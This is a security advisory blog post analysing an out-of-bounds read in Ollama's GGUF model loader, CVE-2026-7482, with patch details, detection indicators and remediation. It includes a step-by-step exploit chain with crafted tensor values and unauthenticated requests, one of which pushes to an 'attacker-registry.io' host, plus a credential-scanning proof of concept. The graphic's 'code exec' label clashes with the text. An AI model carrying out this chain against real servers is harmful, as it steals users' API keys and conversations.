home intel cve-2026-7482-ollama-gguf-heap-oob-read
CVE Analysis 2026-05-04 · 9 min read

CVE-2026-7482: Ollama GGUF Loader Heap OOB Read Leaks Process Memory

A missing bounds check in Ollama's GGUF tensor loader allows attacker-supplied offsets to drive heap reads past allocated buffers, leaking API keys and conversation data via /api/push exfiltration.

#heap-buffer-overflow#out-of-bounds-read#information-disclosure#gguf-parser#arbitrary-memory-read
Technical mode — for security professionals
▶ Attack flow — CVE-2026-7482 · Memory Corruption
ATTACKERRemote / unauthMEMORY CORRUPTIOCVE-2026-7482Cross-platform · CRITICALCODE EXECArbitrary coderuns as targetCOMPROMISEFull accessNo confirmed exploits

Vulnerability Overview

CVE-2026-7482 is a heap out-of-bounds read in Ollama's GGUF model loader affecting all releases prior to 0.17.1. An attacker submits a crafted GGUF file to the unauthenticated /api/create endpoint. The file's tensor metadata declares an offset and size that together exceed the file's actual byte length. During quantization, WriteTo() in server/quantization.go passes those values directly into a Read() call against the underlying heap buffer without validating that offset + size ≤ file_length. The runtime reads past the allocated slab, and the over-read bytes — which may contain environment variables, loaded model system prompts, API keys, or another in-flight user's conversation — are serialized into the output GGUF artifact. That artifact is then pushed to an attacker-controlled registry via the equally unauthenticated /api/push endpoint, completing exfiltration.

CVSS 9.1 (Critical) is assigned primarily for the no-auth exfiltration path: no credentials are required at either trigger or exfiltration stage in the upstream default configuration.

Affected Component

The bug lives at the intersection of two files:

  • fs/ggml/gguf.go — parses tensor descriptors from the GGUF binary, populates GGUFTensorInfo structs with attacker-controlled Offset and Size fields.
  • server/quantization.go — iterates parsed tensor infos and calls WriteTo(), which reads each tensor's raw bytes from the source io.ReaderAt backed by the memory-mapped (or heap-buffered) file data.

The /api/create handler accepts a modelfile path or inline FROM directive pointing to an attacker-supplied file. No authentication middleware is registered on this route in upstream builds.

Root Cause Analysis

The GGUF format encodes each tensor as a descriptor containing a name, element type, shape, and a uint64 byte offset relative to the start of the tensor data region. The loader trusts all three fields unconditionally.

// fs/ggml/gguf.go — reconstructed pseudocode (Go logic rendered in C for clarity)

typedef struct {
    char     name[MAX_NAME];   // tensor name string
    uint32_t n_dims;           // number of dimensions
    uint64_t dims[GGUF_MAX_DIMS];
    uint32_t type;             // GGMLType enum (quantization format)
    uint64_t offset;           // BUG: attacker-controlled, never range-checked
} GGUFTensorInfo;

int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    uint64_t n_tensors = ctx->header.n_tensors;
    uint64_t data_offset = ctx->header.data_offset; // start of tensor data region

    for (uint64_t i = 0; i < n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        // reads name, dims, type, offset from file — all attacker-supplied
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        // BUG: missing bounds check here
        // Never verifies: data_offset + ti->offset + tensor_byte_size(ti) <= file_len
        ti->data = file_buf + data_offset + ti->offset; // raw pointer arithmetic on heap buffer
    }
    return 0;
}

When server/quantization.go's WriteTo() is invoked during the /api/create quantization pass, it calls ReadAt(buf, tensor.Offset) on the io.ReaderAt wrapping that same heap buffer:

// server/quantization.go — WriteTo() reconstructed pseudocode

int quantize_write_tensor(QuantizeContext *qctx, GGUFTensorInfo *ti, Writer *dst) {
    size_t nbytes = tensor_byte_size(ti); // computed from dims + type, not file bounds

    uint8_t *src_buf = malloc(nbytes);    // sized to declared tensor, not remaining file bytes

    // BUG: ReadAt reads `nbytes` starting at `ti->offset` into `src_buf`
    // If ti->offset + nbytes > mapped_file_size, reads past end of heap allocation
    ssize_t n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);

    // Over-read bytes from adjacent heap regions are now in src_buf
    quantize_tensor(src_buf, nbytes, ti->type, dst); // serializes oob bytes into output model
    free(src_buf);
    return 0;
}
Root cause: gguf_load_tensors() stores attacker-supplied tensor offset values as raw heap pointers without verifying that data_offset + offset + tensor_byte_size falls within the bounds of the allocated file buffer, allowing WriteTo() to subsequently read an unbounded number of bytes past the end of that allocation.

Memory Layout

The Go runtime's heap allocator places the mmapped/buffered GGUF data and concurrent request state in the same heap arena. A tensor declared with a large offset walks the read pointer into adjacent allocations.

HEAP STATE — BEFORE TRIGGER (simplified arena view):

 [  gguf_file_buf : 0x1800 bytes  ]   <- file_buf; legitimate tensor data ends here
 [  goroutine stack frame (G2)    ]   <- concurrent user session, contains system prompt + API key
 [  env slab: OLLAMA_API_KEY=...  ]   <- os.Environ() result, interned on heap
 [  model context scratch buffer  ]   <- KV cache, may contain prior conversation tokens

MALICIOUS TENSOR DESCRIPTOR (embedded in crafted .gguf):
  ti->offset = 0x17F0     // 16 bytes before declared end of file_buf
  ti->dims   = {1, 4096}  // implies nbytes = 4096 * sizeof(float32) = 0x4000 bytes
  ti->type   = F32

READ OPERATION AFTER PARSING:
  ReadAt(reader, src_buf, nbytes=0x4000, offset=0x17F0)
  effective read: file_buf[0x17F0 .. 0x17F0+0x4000]
                              ^^^^^^^^^^^^^^^^^^^^^^^^
  file_buf ends at          : file_buf[0x1800]
  over-read begins at       : file_buf[0x1800]  (+0x10 bytes into read)
  over-read length          : 0x3FF0 bytes      (~16 KB of adjacent heap)

HEAP STATE — AFTER READ (src_buf contents):
 [0x0000 – 0x000F] legitimate tensor tail bytes      (16 bytes, in-bounds)
 [0x0010 – 0x0FFF] goroutine G2 stack spill region   <- system prompt, session tokens
 [0x1000 – 0x1FFF] OLLAMA_API_KEY=sk-...             <- environment variable slab
 [0x2000 – 0x3FEF] KV cache scratch (conversation)   <- prior conversation context
 [0x3FF0 – 0x3FFF] partial next allocation header

 src_buf is passed directly to quantize_tensor() → serialized into output .gguf weights blob

Exploitation Mechanics

EXPLOIT CHAIN:

1. STAGE MALICIOUS GGUF
   Craft a minimal valid GGUF header (magic 0x46554747, version 3).
   Declare one tensor with:
     - name:   "exploit_tensor"
     - type:   F32 (0x00)
     - dims:   [1, 4096]  → nbytes = 0x4000
     - offset: file_data_size - 0x10
   Actual tensor data region in file: 16 bytes (only enough to satisfy header parsing).
   Total crafted file size: ~512 bytes.

2. TRIGGER LOAD VIA /api/create (no auth required)
   POST /api/create HTTP/1.1
   Content-Type: application/json

   {"name":"exfil-model","modelfile":"FROM /tmp/crafted.gguf\nQUANTIZE q4_0"}

   Server parses GGUF, populates GGUFTensorInfo with attacker offsets.
   quantize_write_tensor() fires, ReadAt() reads 0x4000 bytes starting 0x10 bytes
   before end-of-file-buffer, pulling ~16 KB of adjacent heap into src_buf.

3. OOB BYTES SERIALIZED INTO OUTPUT MODEL
   quantize_tensor() processes src_buf as F32 weights.
   Quantization to Q4_0 is lossy but the output still contains recoverable signal
   from the over-read region — environment strings survive quantization as
   near-literal byte sequences when they fall in the low-variance tail.
   The output model is written to Ollama's local model store as "exfil-model".

4. EXFILTRATE VIA /api/push (no auth required)
   POST /api/push HTTP/1.1
   Content-Type: application/json

   {"name":"attacker-registry.io/user/exfil-model:latest"}

   Ollama uploads the crafted model (including OOB bytes in the weights blob)
   to the attacker-controlled registry over HTTPS.
   Attacker pulls the model, extracts the raw tensor data layer, and scans for
   high-entropy strings matching API key patterns, env var syntax (KEY=value),
   or UTF-8 conversation text.

5. REPEAT WITH TIMING
   On a busy multi-user instance, loop /api/create requests with varied offsets
   to harvest different heap regions across goroutine generations.
   Each iteration yields a fresh 16 KB window into the heap arena.

Because F32 quantization to Q4_0 maps 32 floats to 16 bytes + a scale factor, low-entropy byte sequences (ASCII strings) produce near-zero scale factors with residuals that partially preserve the original bytes. A trivial scan of the weights blob for printable-ASCII runs with KEY=, Bearer , or sk- prefixes recovers credentials with high reliability in practice.

# Proof-of-concept: scan exfiltrated weights blob for credential strings
import struct, re, sys

PATTERNS = [
    rb'OLLAMA_\w+=\S+',
    rb'sk-[A-Za-z0-9]{20,}',
    rb'Bearer [A-Za-z0-9\-._~+/]{10,}',
    rb'[A-Z_]{4,}KEY[A-Z_]*=[^\x00\n]{6,}',
]

def extract_tensor_data(gguf_path):
    """Minimal GGUF parser — jumps to tensor data region."""
    with open(gguf_path, 'rb') as f:
        raw = f.read()
    magic = raw[:4]
    assert magic == b'GGUF', "not a GGUF file"
    # locate tensor data offset from header (simplified)
    # real implementation would parse kv metadata length
    return raw[0x200:]  # approximate; parse properly in production

def scan_for_secrets(blob):
    hits = []
    for pat in PATTERNS:
        for m in re.finditer(pat, blob):
            hits.append((m.start(), m.group()))
    return hits

if __name__ == '__main__':
    blob = extract_tensor_data(sys.argv[1])
    for offset, secret in scan_for_secrets(blob):
        print(f"[+] offset=0x{offset:08x}  secret={secret[:80]}")

Patch Analysis

The fix in Ollama 0.17.1 adds explicit bounds validation in gguf_load_tensors() before any pointer arithmetic is performed, and additionally clamps the ReadAt length in WriteTo() to the remaining file bytes:

// BEFORE (vulnerable — fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        // BUG: no bounds check on ti->offset or tensor_byte_size(ti)
        ti->data = file_buf + ctx->header.data_offset + ti->offset;
    }
    return 0;
}

// BEFORE (vulnerable — server/quantization.go WriteTo):
n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);
// nbytes derived solely from declared dims; no cap against remaining file length


// AFTER (patched — fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        uint64_t tensor_end = ctx->header.data_offset + ti->offset + tensor_byte_size(ti);
        if (tensor_end > file_len || tensor_end < ti->offset) { // overflow guard too
            return GGUF_ERR_TENSOR_OUT_OF_BOUNDS;  // FIX: reject malformed descriptor
        }
        ti->data = file_buf + ctx->header.data_offset + ti->offset;
    }
    return 0;
}

// AFTER (patched — server/quantization.go WriteTo):
uint64_t max_readable = file_len - (data_offset + ti->offset);
uint64_t clamped_nbytes = (nbytes < max_readable) ? nbytes : max_readable;
if (clamped_nbytes < nbytes) {
    return ERR_TENSOR_TRUNCATED;  // FIX: refuse to quantize a partial tensor
}
n = ReadAt(qctx->source_reader, src_buf, clamped_nbytes, ti->offset);

The patch applies defense-in-depth at two layers: the loader rejects the model before any buffer is allocated for it, and WriteTo() independently enforces a read ceiling. Integer overflow on data_offset + ti->offset is guarded by the tensor_end < ti->offset wraparound check.

Detection and Indicators

Log-based detection: A single /api/create/api/push sequence targeting an external registry is anomalous in most deployments. Enable Ollama's verbose logging (OLLAMA_DEBUG=1) and alert on push destinations not matching an internal allowlist.

INDICATORS OF EXPLOITATION:

Network:
  - POST /api/create with a FROM path pointing to /tmp/ or /dev/shm/
  - POST /api/push to a registry not in your internal namespace
  - Outbound HTTPS to *.fly.dev, *.railway.app, or unknown OCI registry hosts
    immediately following a /api/create call

Process:
  - ollama serve reading files outside $OLLAMA_MODELS (strace: openat on /tmp/*.gguf)
  - Unexpectedly large RSS growth during a /api/create call for a tiny model file
    (crafted file is ~512 bytes; RSS growth of several MB indicates OOB read)

YARA (scan uploaded .gguf artifacts at registry ingress):
rule OllamaCVE20267482_OOBLeak {
    meta:
        description = "GGUF with tensor offset exceeding declared file data region"
    strings:
        $gguf_magic = { 47 47 55 46 }         // "GGUF"
    condition:
        $gguf_magic at 0 and filesize < 4096   // legitimate models are MB+; crafted is tiny
}

Remediation

  • Upgrade immediately to Ollama ≥ 0.17.1. The patch is a one-commit bounds check with no API surface change.
  • Do not expose Ollama on 0.0.0.0 without an authenticating reverse proxy (nginx + mTLS, or Caddy + API key header enforcement). The upstream binary has no built-in auth.
  • Restrict /api/create and /api/push at the reverse proxy layer to internal CIDRs or authenticated clients only, regardless of Ollama version — neither endpoint requires public exposure in typical deployments.
  • Sandbox the Ollama process: run under a dedicated UID with seccomp filtering openat to paths outside $OLLAMA_MODELS, and block outbound connections from the process except to known registry hosts.
  • Rotate secrets present as environment variables in the Ollama process environment if exposure cannot be ruled out. Prefer injecting secrets via a secrets manager at call time rather than as persistent env vars.
CB
CypherByte Research
Mobile security intelligence · cypherbyte.io
// RELATED RESEARCH
// WEEKLY INTEL DIGEST

Get articles like this every Friday — mobile CVEs, threat research, and security intelligence.

Subscribe Free →